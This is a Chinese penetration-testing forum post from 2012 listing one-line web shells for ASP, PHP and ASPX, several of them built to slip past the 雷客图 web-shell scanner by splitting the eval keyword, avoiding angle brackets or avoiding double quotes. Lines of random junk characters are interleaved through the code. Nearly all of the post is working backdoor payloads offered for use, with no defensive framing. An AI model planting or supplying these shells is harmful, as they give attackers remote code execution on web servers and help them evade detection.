中国网络渗透测试联盟
标题:
过雷克图一句话木马
[打印本页]
作者:
admin
时间:
2012-9-23 14:36
标题:
过雷克图一句话木马
asp一句话 <%execute(request("1"))%>
& m5 n& Z8 G/ M1 I3 t U# R1 r
1 e0 w2 T5 z ]/ t* O$ B
php一句话 <?php eval($_POST[1]);?>
) U) E. a' K; l, b) z' M
+ `8 q. J6 q% P' k8 N
aspx一句话
* a$ z) t3 z2 c
9 g$ z, V. m2 l$ U4 E5 q
<script language="C#" runat="server">
! Q; @7 y# m6 z! t; e8 M1 o; j
6 s5 ~& }6 ?/ C* ]; K
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y ("add6bb58e139be10");
! h) [4 V! i5 U! R* n/ S4 C/ C
) C1 u* x* n& F! c4 O
</script>
5 P+ r! ~% |( p! ~
. W3 Z7 Q; U- D+ z n6 D' j
可以躲过雷客图的一句话。
+ e2 D2 X5 n7 p2 P1 m+ j9 Q, D
( o( R/ {: H/ ]/ |: m% c
<%
) R8 U) L5 {2 ^5 u# [
6 B6 `- t9 r# F% c
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
8 i: J# X6 w9 C/ O& y
2 `$ e, R: I7 T: C& J% I) ^
ms.Language="VBScript"
Z7 n; n- S5 {' c* h* Q
/ Y T ~. j; L0 e6 J4 i7 @
ms.AddObject "Response", Response
' P$ K- ]1 `2 D7 e g2 a
# g5 K+ |& R* ^( S1 n; c- X3 _
ms.AddObject "request", request
, ~$ H$ H; L# L4 Y2 m/ X7 c5 x$ s+ r' f
( W# q1 I/ }6 \9 I: O6 X
ms.ExecuteStatement("ev"&"al(request(""1""))")
, |4 f) w4 A# n* h* U5 S& y
1 W6 A! V) G1 A) j9 _9 A3 S
%>
! j% v# _+ d/ i4 ?7 o* t
) u; Z. p: g/ A4 g
不用'<,>'的asp一句话
/ R) b8 j' r0 Z" m* {3 r5 O
- c4 G3 Q' h4 R0 {# L& b
<script language=VBScript runat=server>execute request("1")</script>
" {7 u+ @7 ?3 d: H/ _8 H
* b3 ^# K/ K1 Y) Z( J9 t2 C. a, F
不用双引号的一句话。
6 ~% s$ E! @5 @* M, J
6 p7 b8 ?9 s6 i E: p/ w
<%eval request(chr(35))%>
3 g" n* X x0 ^1 U3 H
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2